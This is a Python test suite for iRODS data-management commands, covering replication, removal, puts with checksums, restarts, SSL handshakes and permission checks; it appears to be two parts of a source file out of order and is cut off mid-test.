assertiCmd(s.adminsession, "irepl -R " + self.testresc + " " + filename) # replicate to test resource
assertiCmd(s.adminsession, "irepl -R thirdresc " + filename) # replicate to third resource
assertiCmd(s.adminsession, "irepl " + filename) # replicate overtop default resource
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", filename) # for debugging
assertiCmd(s.adminsession, "irepl -R " + self.testresc + " " + filename) # replicate overtop test resource
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", filename) # for debugging
assertiCmd(s.adminsession, "irepl -R thirdresc " + filename) # replicate overtop third resource
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", filename) # for debugging
# should not have a replica 3
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 3 ", " & " + filename])
# should not have a replica 4
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 4 ", " & " + filename])
assertiCmd(s.adminsession, "irm -f " + filename) # cleanup file
assertiCmd(s.adminsession, "iadmin rmresc thirdresc") # remove third resource
# local cleanup
os.remove(filepath)
def test_irepl_over_existing_bad_replica__ticket_1705(self):
# local setup
filename = "reploverwritebad.txt"
filepath = create_local_testfile(filename)
doublefile = "doublefile.txt"
os.system("cat %s %s > %s" % (filename, filename, doublefile))
doublesize = str(os.stat(doublefile).st_size)
# assertions
assertiCmd(s.adminsession, "ils -L " + filename, "ERROR", "does not exist") # should not be listed
assertiCmd(s.adminsession, "iput " + filename) # put file
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", filename) # for debugging
assertiCmd(s.adminsession, "irepl -R " + self.testresc + " " + filename) # replicate to test resource
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", filename) # for debugging
# overwrite default repl with different data
assertiCmd(s.adminsession, "iput -f %s %s" % (doublefile, filename))
# default resource should have clean copy
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 0 ", " & " + filename])
# default resource should have new double clean copy
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 0 ", " " + doublesize + " ", " & " + filename])
# test resource should not have doublesize file
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST",
[" 1 " + self.testresc, " " + doublesize + " ", " " + filename])
# replicate back onto test resource
assertiCmd(s.adminsession, "irepl -R " + self.testresc + " " + filename)
# test resource should have new clean doublesize file
assertiCmd(s.adminsession, "ils -L " + filename, "LIST",
[" 1 " + self.testresc, " " + doublesize + " ", " & " + filename])
# should not have a replica 2
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 2 ", " & " + filename])
# local cleanup
os.remove(filepath)
os.remove(doublefile)
# repl update ( repave old copies )
# walk through command line switches
def test_irepl_with_purgec(self):
# local setup
filename = "purgecreplfile.txt"
filepath = os.path.abspath(filename)
f = open(filepath, 'wb')
f.write("TESTFILE -- [" + filepath + "]")
f.close()
# assertions
assertiCmd(s.adminsession, "ils -L " + filename, "ERROR", "does not exist") # should not be listed
assertiCmd(s.adminsession, "iput " + filename) # put file
assertiCmd(s.adminsession, "irepl -R " + self.testresc + " --purgec " + filename) # replicate to test resource
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 0 ", filename]) # should be trimmed
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 1 ", filename]) # should be listed once
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 2 ", filename]) # should be listed only once
# local cleanup
output = commands.getstatusoutput('rm ' + filepath)
def test_irepl_with_admin_mode(self):
pydevtest_common.touch( "file.txt" )
for i in range(0, 100):
assertiCmd(s.sessions[1], "iput file.txt " + str(i) + ".txt", "EMPTY")
homepath = "/" + s.adminsession.getZoneName() + "/home/" + s.sessions[1].getUserName()
assertiCmd(s.adminsession, "irepl -r -M -R " + self.testresc + " " + homepath, "EMPTY" ) # creates replica
###################
# irm
###################
def test_irm_doesnotexist(self):
assertiCmdFail(s.adminsession, "irm doesnotexist") # does not exist
def test_irm(self):
assertiCmd(s.adminsession, "ils -L " + self.testfile, "LIST", self.testfile) # should be listed
assertiCmd(s.adminsession, "irm " + self.testfile) # remove from grid
assertiCmdFail(s.adminsession, "ils -L " + self.testfile, "LIST", self.testfile) # should be deleted
trashpath = "/" + s.adminsession.getZoneName() + "/trash/home/" + s.adminsession.getUserName() + \
"/" + s.adminsession.sessionId
# should be in trash
assertiCmd(s.adminsession, "ils -L " + trashpath + "/" + self.testfile, "LIST", self.testfile)
def test_irm_force(self):
assertiCmd(s.adminsession, "ils -L " + self.testfile, "LIST", self.testfile) # should be listed
assertiCmd(s.adminsession, "irm -f " + self.testfile) # remove from grid
assertiCmdFail(s.adminsession, "ils -L " + self.testfile, "LIST", self.testfile) # should be deleted
trashpath = "/" + s.adminsession.getZoneName() + "/trash/home/" + s.adminsession.getUserName() + \
"/" + s.adminsession.sessionId
# should not be in trash
assertiCmdFail(s.adminsession, "ils -L " + trashpath + "/" + self.testfile, "LIST", self.testfile)
def test_irm_specific_replica(self):
assertiCmd(s.adminsession, "ils -L " + self.testfile, "LIST", self.testfile) # should be listed
assertiCmd(s.adminsession, "irepl -R " + self.testresc + " " + self.testfile) # creates replica
assertiCmd(s.adminsession, "ils -L " + self.testfile, "LIST", self.testfile) # should be listed twice
assertiCmd(s.adminsession, "irm -n 0 " + self.testfile) # remove original from grid
# replica 1 should be there
assertiCmd(s.adminsession, "ils -L " + self.testfile, "LIST", ["1 " + self.testresc, self.testfile])
assertiCmdFail(s.adminsession, "ils -L " + self.testfile, "LIST",
["0 " + s.adminsession.getDefResource(), self.testfile]) # replica 0 should be gone
trashpath = "/" + s.adminsession.getZoneName() + "/trash/home/" + s.adminsession.getUserName() + \
"/" + s.adminsession.sessionId
assertiCmdFail(s.adminsession, "ils -L " + trashpath + "/" + self.testfile, "LIST",
["0 " + s.adminsession.getDefResource(), self.testfile]) # replica should not be in trash
def test_irm_recursive_file(self):
assertiCmd(s.adminsession, "ils -L " + self.testfile, "LIST", self.testfile) # should be listed
assertiCmd(s.adminsession, "irm -r " + self.testfile) # should not fail, even though a collection
def test_irm_recursive(self):
assertiCmd(s.adminsession, "icp -r " + self.testdir + " copydir") # make a dir copy
assertiCmd(s.adminsession, "ils -L ", "LIST", "copydir") # should be listed
assertiCmd(s.adminsession, "irm -r copydir") # should remove
assertiCmdFail(s.adminsession, "ils -L ", "LIST", "copydir") # should not be listed
@unittest.skipIf(RUN_IN_TOPOLOGY == True, "Skip for Topology Testing")
def test_irm_with_read_permission(self):
assertiCmd(s.sessions[1], "icd ../../public") # switch to shared area
assertiCmd(s.sessions[1], "ils -AL " + self.testfile, "LIST", self.testfile) # should be listed
assertiCmdFail(s.sessions[1], "irm " + self.testfile) # read perm should not be allowed to remove
assertiCmd(s.sessions[1], "ils -AL " + self.testfile, "LIST", self.testfile) # should still be listed
@unittest.skipIf(RUN_IN_TOPOLOGY == True, "Skip for Topology Testing")
def test_irm_with_write_permission(self):
assertiCmd(s.sessions[2], "icd ../../public") # switch to shared area
assertiCmd(s.sessions[2], "ils -AL " + self.testfile, "LIST", self.testfile) # should be listed
assertiCmdFail(s.sessions[2], "irm " + self.testfile) # write perm should not be allowed to remove
assertiCmd(s.sessions[2], "ils -AL " + self.testfile, "LIST", self.testfile) # should still be listed
###################
# irmtrash
###################
def test_irmtrash_admin(self):
# assertions
assertiCmd(s.adminsession, "irm " + self.testfile) # remove from grid
assertiCmd(s.adminsession, "ils -rL /" + s.adminsession.getZoneName() + "/trash/home/" +
s.adminsession.getUserName() + "/", "LIST", self.testfile) # should be listed
assertiCmd(s.adminsession, "irmtrash") # should be listed
assertiCmdFail(s.adminsession, "ils -rL /" + s.adminsession.getZoneName() + "/trash/home/" +
s.adminsession.getUserName() + "/", "LIST", self.testfile) # should be deleted
[#858] test some admin_mode commands
import sys
if (sys.version_info >= (2, 7)):
import unittest
else:
import unittest2 as unittest
import pydevtest_common
from pydevtest_common import assertiCmd, assertiCmdFail, interruptiCmd, create_local_testfile, create_local_largefile, get_hostname, RUN_IN_TOPOLOGY, get_irods_top_level_dir, get_irods_config_dir, mod_json_file
import pydevtest_sessions as s
import commands
import os
import shlex
import datetime
import time
import psutil
import base64
import hashlib
class ResourceBase(object):
def __init__(self):
print "in ResourceBase.__init__"
self.testfile = "pydevtest_testfile.txt"
self.testdir = "pydevtest_testdir"
self.testresc = "pydevtest_TestResc"
self.anotherresc = "pydevtest_AnotherResc"
def run_resource_setup(self):
print "run_resource_setup - BEGIN"
# set up resource itself
for i in self.my_test_resource["setup"]:
parameters = shlex.split(i) # preserves quoted substrings
if parameters[0] == "iadmin":
print s.adminsession.runAdminCmd(parameters[0], parameters[1:])
else:
output = commands.getstatusoutput(" ".join(parameters))
print output
# set up test resource
print "run_resource_setup - creating test resources"
output = commands.getstatusoutput("hostname")
hostname = output[1]
s.adminsession.runAdminCmd(
'iadmin', ["mkresc", self.testresc, "unix file system", hostname + ":/tmp/pydevtest_" + self.testresc])
s.adminsession.runAdminCmd(
'iadmin', ["mkresc", self.anotherresc, "unix file system", hostname + ":/tmp/pydevtest_" + self.anotherresc])
# set up test files
print "run_resource_setup - generating local testfile"
f = open(self.testfile, 'wb')
f.write("I AM A TESTFILE -- [" + self.testfile + "]")
f.close()
print "run_resource_setup - adding testfile to grid"
s.adminsession.runCmd('imkdir', [self.testdir])
s.adminsession.runCmd('iput', [self.testfile])
print "run_resource_setup - adding testfile to grid public directory"
s.adminsession.runCmd('icp', [self.testfile, "../../public/"]) # copy of testfile into public
print "run_resource_setup - setting permissions"
# permissions
s.adminsession.runCmd(
'ichmod', ["read", s.users[1]['name'], "../../public/" + self.testfile]) # read for user1
s.adminsession.runCmd(
'ichmod', ["write", s.users[2]['name'], "../../public/" + self.testfile]) # write for user2
# set test group
self.testgroup = s.testgroup
print "run_resource_setup - END"
def run_resource_teardown(self):
print "run_resource_teardown - BEGIN"
# local file cleanup
print "run_resource_teardown - removing local testfile"
os.unlink(self.testfile)
# remove grid test files
print "run_resource_teardown - removing testfile from grid public directory"
s.adminsession.runCmd('icd')
s.adminsession.runCmd('irm', [self.testfile, "../public/" + self.testfile])
# remove any bundle files
print "run_resource_teardown - removing any bundle files"
s.adminsession.runCmd('irm -rf ../../bundle')
# tear down admin session files
print "run_resource_teardown - admin session removing session files"
s.adminsession.runCmd('irm', ['-r', s.adminsession.sessionId])
# clean trash
print "run_resource_teardown - clean trash"
s.adminsession.runCmd('irmtrash', ['-M'])
# remove resc
print "run_resource_teardown - removing test resources"
s.adminsession.runAdminCmd('iadmin', ['rmresc', self.testresc])
s.adminsession.runAdminCmd('iadmin', ['rmresc', self.anotherresc])
# tear down resource itself
print "run_resource_teardown - tearing down actual resource"
for i in self.my_test_resource["teardown"]:
parameters = shlex.split(i) # preserves quoted substrings
if parameters[0] == "iadmin":
print s.adminsession.runAdminCmd(parameters[0], parameters[1:])
else:
output = commands.getstatusoutput(" ".join(parameters))
print output
print "run_resource_teardown - END"
class ShortAndSuite(ResourceBase):
def __init__(self):
print "in ShortAndSuite.__init__"
ResourceBase.__init__(self)
def test_awesome(self):
print "AWESOME!"
def test_local_iget(self):
print self.testfile
# local setup
localfile = "local.txt"
# assertions
assertiCmd(s.adminsession, "iget " + self.testfile + " " + localfile) # iget
output = commands.getstatusoutput('ls ' + localfile)
print " output: [" + output[1] + "]"
assert output[1] == localfile
# local cleanup
output = commands.getstatusoutput('rm ' + localfile)
class ResourceSuite(ResourceBase):
'''Define the tests to be run for a resource type.
This class is designed to be used as a base class by developers
when they write tests for their own resource plugins.
All these tests will be inherited and the developer can add
any new tests for new functionality or replace any tests
they need to modify.
'''
def __init__(self):
print "in ResourceSuite.__init__"
ResourceBase.__init__(self)
###################
# iget
###################
def test_local_iget(self):
# local setup
localfile = "local.txt"
# assertions
assertiCmd(s.adminsession, "iget " + self.testfile + " " + localfile) # iget
output = commands.getstatusoutput('ls ' + localfile)
print " output: [" + output[1] + "]"
assert output[1] == localfile
# local cleanup
output = commands.getstatusoutput('rm ' + localfile)
def test_local_iget_with_overwrite(self):
# local setup
localfile = "local.txt"
# assertions
assertiCmd(s.adminsession, "iget " + self.testfile + " " + localfile) # iget
assertiCmdFail(s.adminsession, "iget " + self.testfile + " " + localfile) # already exists
assertiCmd(s.adminsession, "iget -f " + self.testfile + " " + localfile) # already exists, so force
output = commands.getstatusoutput('ls ' + localfile)
print " output: [" + output[1] + "]"
assert output[1] == localfile
# local cleanup
output = commands.getstatusoutput('rm ' + localfile)
def test_local_iget_with_bad_option(self):
# assertions
assertiCmdFail(s.adminsession, "iget -z") # run iget with bad option
def test_iget_with_purgec(self):
# local setup
filename = "purgecgetfile.txt"
filepath = os.path.abspath(filename)
f = open(filepath, 'wb')
f.write("TESTFILE -- [" + filepath + "]")
f.close()
# assertions
assertiCmd(s.adminsession, "ils -L " + filename, "ERROR", "does not exist") # should not be listed
assertiCmd(s.adminsession, "iput " + filename) # put file
assertiCmd(s.adminsession, "iget -f --purgec " + filename) # get file
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 0 ", filename]) # should be listed once
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 1 ", filename]) # should be listed only once
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 2 ", filename]) # should be listed only once
# local cleanup
output = commands.getstatusoutput('rm ' + filepath)
###################
# imv
###################
def test_local_imv(self):
# local setup
movedfile = "moved_file.txt"
# assertions
assertiCmd(s.adminsession, "imv " + self.testfile + " " + movedfile) # move
assertiCmd(s.adminsession, "ils -L " + movedfile, "LIST", movedfile) # should be listed
# local cleanup
def test_local_imv_to_directory(self):
# local setup
# assertions
assertiCmd(s.adminsession, "imv " + self.testfile + " " + self.testdir) # move
assertiCmd(s.adminsession, "ils -L " + self.testdir, "LIST", self.testfile) # should be listed
# local cleanup
def test_local_imv_to_existing_filename(self):
# local setup
copyfile = "anotherfile.txt"
# assertions
assertiCmd(s.adminsession, "icp " + self.testfile + " " + copyfile) # icp
# cannot overwrite existing file
assertiCmd(s.adminsession, "imv " + self.testfile + " " + copyfile, "ERROR", "CAT_NAME_EXISTS_AS_DATAOBJ")
# local cleanup
###################
# iphymv
###################
def test_iphymv_to_nonexistent_resource(self):
assertiCmd(s.adminsession, "ils -L", "STDOUT", self.testfile) # debug
assertiCmd(s.adminsession, "iphymv -R nonexistentresc " + self.testfile,
"STDERR", "SYS_RESC_DOES_NOT_EXIST") # should fail
assertiCmd(s.adminsession, "ils -L", "STDOUT", self.testfile) # debug
def test_iphymv_admin_mode(self):
pydevtest_common.touch( "file.txt" )
for i in range(0, 100):
assertiCmd(s.sessions[1], "iput file.txt " + str(i) + ".txt", "EMPTY")
homepath = "/" + s.adminsession.getZoneName() + "/home/" + s.sessions[1].getUserName() + "/" + s.sessions[1].sessionId
assertiCmd(s.adminsession, "iphymv -r -M -R " + self.testresc + " " + homepath, "EMPTY" ) # creates replica
###################
# iput
###################
def test_ssl_iput_with_rods_env(self):
# set up client and server side for ssl handshake
# server side certificate setup
os.system("openssl genrsa -out server.key 2> /dev/null")
os.system("openssl req -batch -new -key server.key -out server.csr")
os.system("openssl req -batch -new -x509 -key server.key -out server.crt -days 365")
os.system("mv server.crt chain.pem")
# normally 2048, but smaller size here for speed
os.system("openssl dhparam -2 -out dhparams.pem 100 2> /dev/null")
# add client irodsEnv settings
clientEnvFile = s.adminsession.sessionDir + "/irods_environment.json"
os.system("cp %s %sOrig" % (clientEnvFile, clientEnvFile))
env = {}
env['irods_client_server_policy'] = 'CS_NEG_REQUIRE'
env['irods_ssl_certificate_chain_file'] = get_irods_top_level_dir() + "/tests/pydevtest/chain.pem"
env['irods_ssl_certificate_key_file'] = get_irods_top_level_dir() + "/tests/pydevtest/server.key"
env['irods_ssl_dh_params_file'] = get_irods_top_level_dir() + "/tests/pydevtest/dhparams.pem"
env['irods_ssl_verify_server'] = "none"
mod_json_file(clientEnvFile, env)
# server needs the environment variable to
# read the correctly changed environment
# server reboot to pick up new irodsEnv settings
env_val = s.adminsession.sessionDir + "/irods_environment.json"
sys_cmd = "export IRODS_ENVIRONMENT_FILE=" + env_val + ";" + \
get_irods_top_level_dir() + "/iRODS/irodsctl restart"
os.system(sys_cmd)
# do the encrypted put
filename = "encryptedfile.txt"
filepath = create_local_testfile(filename)
assertiCmd(s.adminsession, "iinit rods") # reinitialize
# small file
assertiCmd(s.adminsession, "iput " + filename) # encrypted put - small file
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", filename) # should be listed
# reset client environment to not require SSL
os.system("mv %sOrig %s" % (clientEnvFile, clientEnvFile))
# clean up
os.system("rm server.key server.csr chain.pem dhparams.pem")
os.remove(filename)
def test_ssl_iput_small_and_large_files(self):
# set up client and server side for ssl handshake
# server side certificate setup
os.system("openssl genrsa -out server.key 2> /dev/null")
os.system("openssl req -batch -new -key server.key -out server.csr")
os.system("openssl req -batch -new -x509 -key server.key -out server.crt -days 365")
os.system("mv server.crt chain.pem")
# normally 2048, but smaller size here for speed
os.system("openssl dhparam -2 -out dhparams.pem 100 2> /dev/null")
# server side environment variables
os.environ['irodsSSLCertificateChainFile'] = get_irods_top_level_dir() + "/tests/pydevtest/chain.pem"
os.environ['irodsSSLCertificateKeyFile'] = get_irods_top_level_dir() + "/tests/pydevtest/server.key"
os.environ['irodsSSLDHParamsFile'] = get_irods_top_level_dir() + "/tests/pydevtest/dhparams.pem"
# client side environment variables
os.environ['irodsSSLVerifyServer'] = "none"
# add client irodsEnv settings
clientEnvFile = s.adminsession.sessionDir + "/irods_environment.json"
os.system("cp %s %sOrig" % (clientEnvFile, clientEnvFile))
env = {}
env['irods_client_server_policy'] = 'CS_NEG_REQUIRE'
mod_json_file(clientEnvFile, env)
# server reboot to pick up new irodsEnv settings
os.system(get_irods_top_level_dir() + "/iRODS/irodsctl restart")
# do the encrypted put
filename = "encryptedfile.txt"
filepath = create_local_testfile(filename)
assertiCmd(s.adminsession, "iinit rods") # reinitialize
# small file
assertiCmd(s.adminsession, "iput " + filename) # encrypted put - small file
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", filename) # should be listed
# large file
largefilename = "BIGencryptedfile.txt"
output = commands.getstatusoutput('dd if=/dev/zero of=' + largefilename + ' bs=1M count=60')
assert output[0] == 0, "dd did not successfully exit"
#os.system("ls -al "+largefilename)
assertiCmd(s.adminsession, "iput " + largefilename) # encrypted put - large file
assertiCmd(s.adminsession, "ils -L " + largefilename, "LIST", largefilename) # should be listed
# reset client environment to not require SSL
os.system("mv %sOrig %s" % (clientEnvFile, clientEnvFile))
# clean up
os.system("rm server.key server.csr chain.pem dhparams.pem")
os.remove(filename)
os.remove(largefilename)
@unittest.skipIf(psutil.disk_usage('/').free < 20000000000, "not enough free space for 5 x 2.3GB file ( local + iput + 3 repl children )")
def test_local_iput_with_really_big_file__ticket_1623(self):
# regression test against ticket [#1623]
# bigfilesize = [2287636992] is just under 'int' threshold
# bigfilesize = [2297714688] is just big enough to trip 'int' size error buffers
# local setup
big = "reallybigfile.txt"
bigger = "tmp.txt"
f = open(big, 'wb')
f.write("skjfhrq274fkjhvifqp92348fuho3uigho4iulqf2h3foq3i47fuhqof9q834fyhoq3iufhq34f8923fhoq348fhurferfwheere")
f.write("skjfhrq274fkjhvifqp92348fuho3uigho4iulqf2h3foq3i47fuhqof9q834fyhoq3iufhq34f8923fhoq348fhurferfwheere")
f.write("skjfhrq274fkjhvg34eere----2")
f.close()
for i in range(9):
commands.getstatusoutput(
"cat " + big + " " + big + " " + big + " " + big + " " + big + " " + big + " > " + bigger)
os.rename(bigger, big)
datafilename = big
# assertions
print "bigfilesize = [" + str(os.stat(datafilename).st_size) + "]"
# should not be listed
assertiCmd(s.adminsession, "ils -L " + datafilename, "ERROR", [datafilename, "does not exist"])
assertiCmd(s.adminsession, "iput " + datafilename) # iput
assertiCmd(s.adminsession, "ils -L " + datafilename, "LIST", datafilename) # should be listed
# local cleanup
output = commands.getstatusoutput('rm ' + datafilename)
def test_local_iput(self):
'''also needs to count and confirm number of replicas after the put'''
# local setup
datafilename = "newfile.txt"
f = open(datafilename, 'wb')
f.write("TESTFILE -- [" + datafilename + "]")
f.close()
# assertions
assertiCmdFail(s.adminsession, "ils -L " + datafilename, "LIST", datafilename) # should not be listed
assertiCmd(s.adminsession, "iput " + datafilename) # iput
assertiCmd(s.adminsession, "ils -L " + datafilename, "LIST", datafilename) # should be listed
# local cleanup
output = commands.getstatusoutput('rm ' + datafilename)
def test_local_iput_overwrite(self):
assertiCmdFail(s.adminsession, "iput " + self.testfile) # fail, already exists
assertiCmd(s.adminsession, "iput -f " + self.testfile) # iput again, force
def test_local_iput_recursive(self):
recursivedirname = "dir"
def test_local_iput_lower_checksum(self):
# local setup
datafilename = "newfile.txt"
with open(datafilename, 'wb') as f:
f.write("TESTFILE -- [" + datafilename + "]")
# assertions
assertiCmd(s.adminsession, "iput -k " + datafilename) # iput
with open(datafilename) as f:
checksum = hashlib.sha256(f.read()).digest().encode("base64").strip()
assertiCmd(s.adminsession, "ils -L", "LIST", "sha2:" + checksum) # check proper checksum
# local cleanup
output = commands.getstatusoutput('rm ' + datafilename)
def test_local_iput_upper_checksum(self):
# local setup
datafilename = "newfile.txt"
with open(datafilename, 'wb') as f:
f.write("TESTFILE -- [" + datafilename + "]")
# assertions
assertiCmd(s.adminsession, "iput -K " + datafilename) # iput
with open(datafilename) as f:
checksum = hashlib.sha256(f.read()).digest().encode("base64").strip()
assertiCmd(s.adminsession, "ils -L", "LIST", "sha2:" + checksum) # check proper checksum
# local cleanup
output = commands.getstatusoutput('rm ' + datafilename)
def test_local_iput_onto_specific_resource(self):
# local setup
datafilename = "anotherfile.txt"
f = open(datafilename, 'wb')
f.write("TESTFILE -- [" + datafilename + "]")
f.close()
# assertions
assertiCmdFail(s.adminsession, "ils -L " + datafilename, "LIST", datafilename) # should not be listed
assertiCmd(s.adminsession, "iput -R " + self.testresc + " " + datafilename) # iput
assertiCmd(s.adminsession, "ils -L " + datafilename, "LIST", datafilename) # should be listed
assertiCmd(s.adminsession, "ils -L " + datafilename, "LIST", self.testresc) # should be listed
# local cleanup
output = commands.getstatusoutput('rm ' + datafilename)
def test_local_iput_interrupt_directory(self):
# local setup
datadir = "newdatadir"
output = commands.getstatusoutput('mkdir ' + datadir)
datafiles = ["file1", "file2", "file3", "file4", "file5", "file6", "file7"]
for datafilename in datafiles:
print "-------------------"
print "creating " + datafilename + "..."
localpath = datadir + "/" + datafilename
output = commands.getstatusoutput('dd if=/dev/zero of=' + localpath + ' bs=1M count=20')
print output[1]
assert output[0] == 0, "dd did not successfully exit"
rf = "collectionrestartfile"
# assertions
iputcmd = "iput -X " + rf + " -r " + datadir
if os.path.exists(rf):
os.unlink(rf)
interruptiCmd(s.adminsession, iputcmd, rf, 10) # once restartfile reaches 10 bytes
assert os.path.exists(rf), rf + " should now exist, but did not"
output = commands.getstatusoutput('cat ' + rf)
print " restartfile [" + rf + "] contents --> [" + output[1] + "]"
assertiCmd(s.adminsession, "ils -L " + datadir, "LIST", datadir) # just to show contents
assertiCmd(s.adminsession, iputcmd, "LIST", "File last completed") # confirm the restart
for datafilename in datafiles:
assertiCmd(s.adminsession, "ils -L " + datadir, "LIST", datafilename) # should be listed
# local cleanup
output = commands.getstatusoutput('rm -rf ' + datadir)
output = commands.getstatusoutput('rm ' + rf)
def test_local_iput_interrupt_largefile(self):
# local setup
datafilename = "bigfile"
print "-------------------"
print "creating " + datafilename + "..."
output = commands.getstatusoutput('dd if=/dev/zero of=' + datafilename + ' bs=1M count=150')
print output[1]
assert output[0] == 0, "dd did not successfully exit"
rf = "bigrestartfile"
# assertions
iputcmd = "iput --lfrestart " + rf + " " + datafilename
if os.path.exists(rf):
os.unlink(rf)
interruptiCmd(s.adminsession, iputcmd, rf, 10) # once restartfile reaches 10 bytes
time.sleep(2) # wait for all interrupted threads to exit
assert os.path.exists(rf), rf + " should now exist, but did not"
output = commands.getstatusoutput('cat ' + rf)
print " restartfile [" + rf + "] contents --> [" + output[1] + "]"
today = datetime.date.today()
# length should not be zero
assertiCmdFail(s.adminsession, "ils -L " + datafilename, "LIST", [" 0 " + today.isoformat(), datafilename])
# confirm the restart
assertiCmd(s.adminsession, iputcmd, "LIST", datafilename + " was restarted successfully")
assertiCmd(s.adminsession, "ils -L " + datafilename, "LIST",
[" " + str(os.stat(datafilename).st_size) + " " + today.isoformat(), datafilename]) # length should be size on disk
# local cleanup
output = commands.getstatusoutput('rm ' + datafilename)
output = commands.getstatusoutput('rm ' + rf)
def test_local_iput_physicalpath_no_permission(self):
# local setup
datafilename = "newfile.txt"
f = open(datafilename, 'wb')
f.write("TESTFILE -- [" + datafilename + "]")
f.close()
# assertions
assertiCmd(s.adminsession, "iput -p /newfileinroot.txt " + datafilename, "ERROR",
["UNIX_FILE_CREATE_ERR", "Permission denied"]) # should fail to write
# local cleanup
output = commands.getstatusoutput('rm ' + datafilename)
def test_local_iput_physicalpath(self):
# local setup
datafilename = "newfile.txt"
f = open(datafilename, 'wb')
f.write("TESTFILE -- [" + datafilename + "]")
f.close()
# assertions
fullpath = get_irods_top_level_dir() + "/newphysicalpath.txt"
assertiCmd(s.adminsession, "iput -p " + fullpath + " " + datafilename) # should complete
assertiCmd(s.adminsession, "ils -L " + datafilename, "LIST", datafilename) # should be listed
assertiCmd(s.adminsession, "ils -L " + datafilename, "LIST", fullpath) # should be listed
# local cleanup
output = commands.getstatusoutput('rm ' + datafilename)
def test_admin_local_iput_relative_physicalpath_into_server_bin(self):
# local setup
datafilename = "newfile.txt"
f = open(datafilename, 'wb')
f.write("TESTFILE -- [" + datafilename + "]")
f.close()
# assertions
relpath = "relativephysicalpath.txt"
# should disallow relative path
assertiCmd(s.adminsession, "iput -p " + relpath + " " + datafilename, "ERROR", "absolute")
# local cleanup
output = commands.getstatusoutput('rm ' + datafilename)
def test_local_iput_relative_physicalpath_into_server_bin(self):
# local setup
datafilename = "newfile.txt"
f = open(datafilename, 'wb')
f.write("TESTFILE -- [" + datafilename + "]")
f.close()
# assertions
relpath = "relativephysicalpath.txt"
assertiCmd(s.sessions[1], "iput -p " + relpath + " " + datafilename, "ERROR", "absolute") # should error
# local cleanup
output = commands.getstatusoutput('rm ' + datafilename)
def test_local_iput_with_changed_target_filename(self):
# local setup
datafilename = "newfile.txt"
f = open(datafilename, 'wb')
f.write("TESTFILE -- [" + datafilename + "]")
f.close()
# assertions
changedfilename = "different.txt"
assertiCmd(s.adminsession, "iput " + datafilename + " " + changedfilename) # should complete
assertiCmd(s.adminsession, "ils -L " + changedfilename, "LIST", changedfilename) # should be listed
# local cleanup
output = commands.getstatusoutput('rm ' + datafilename)
@unittest.skip("TODO: revisit later, this is causing issues with mysql")
def test_local_iput_collision_with_wlock(self):
# local setup
datafilename = "collisionfile1.txt"
print "-------------------"
print "creating " + datafilename + "..."
output = commands.getstatusoutput('dd if=/dev/zero of=' + datafilename + ' bs=1M count=30')
print output[1]
assert output[0] == 0, "dd did not successfully exit"
# assertions
begin = time.time()
errorflag = False
procs = set()
pids = set()
# start multiple icommands in parallel
initialdelay = 3 # seconds
for i in range(5):
if i == 0:
# add a three second delay before the first icommand
p = s.adminsession.runCmd(
'iput', ["-vf", "--wlock", datafilename], waitforresult=False, delay=initialdelay)
else:
p = s.adminsession.runCmd('iput', ["-vf", "--wlock", datafilename], waitforresult=False, delay=0)
procs.add(p)
pids.add(p.pid)
while pids:
pid, retval = os.wait()
for proc in procs:
if proc.pid == pid:
print "pid " + str(pid) + ":"
if retval != 0:
print " * ERROR occurred * <------------"
errorflag = True
print " retval [" + str(retval) + "]"
print " stdout [" + proc.stdout.read().strip() + "]"
print " stderr [" + proc.stderr.read().strip() + "]"
pids.remove(pid)
elapsed = time.time() - begin
print "\ntotal time [" + str(elapsed) + "]"
assert elapsed > initialdelay
# local cleanup
output = commands.getstatusoutput('rm ' + datafilename)
assert errorflag == False, "oops, had an error"
@unittest.skip("TODO: revisit later, not sure this is testing anything of interest")
def test_local_iput_collision_without_wlock(self):
# local setup
datafilename = "collisionfile2.txt"
print "-------------------"
print "creating " + datafilename + "..."
output = commands.getstatusoutput('dd if=/dev/zero of=' + datafilename + ' bs=1M count=30')
print output[1]
assert output[0] == 0, "dd did not successfully exit"
# assertions
begin = time.time()
errorflag = False
procs = set()
pids = set()
# start multiple icommands in parallel
initialdelay = 3 # seconds
for i in range(7):
if i == 0:
# add a three second delay before the first icommand
p = s.adminsession.runCmd('iput', ["-vf", datafilename], waitforresult=False, delay=initialdelay)
else:
p = s.adminsession.runCmd('iput', ["-vf", datafilename], waitforresult=False, delay=0)
procs.add(p)
pids.add(p.pid)
while pids:
pid, retval = os.wait()
for proc in procs:
if proc.pid == pid:
print "pid " + str(pid) + ":"
if retval != 0:
errorflag = True
else:
print " * Unexpectedly, No ERROR occurred * <------------"
print " retval [" + str(retval) + "]"
print " stdout [" + proc.stdout.read().strip() + "]"
print " stderr [" + proc.stderr.read().strip() + "]"
pids.remove(pid)
elapsed = time.time() - begin
print "\ntotal time [" + str(elapsed) + "]"
# local cleanup
output = commands.getstatusoutput('rm ' + datafilename)
assert errorflag == True, "Expected ERRORs did not occur"
@unittest.skipIf(RUN_IN_TOPOLOGY == True, "Skip for Topology Testing")
def test_iput_overwrite_others_file__ticket_2086(self):
# pre state
assertiCmd(s.adminsession, "ils -L", "LIST", self.testfile) # should be listed
# local setup
filename = "overwritefile.txt"
filepath = create_local_testfile(filename)
# alice tries to put
homepath = "/home/" + s.adminsession.getUserName() + "/" + s.adminsession.sessionId + "/" + self.testfile
logicalpath = "/" + s.adminsession.getZoneName() + homepath
assertiCmd(s.sessions[1], "iput " + filepath + " " + logicalpath, "ERROR", "CAT_NO_ACCESS_PERMISSION") # iput
# check physicalpaths (of all replicas)
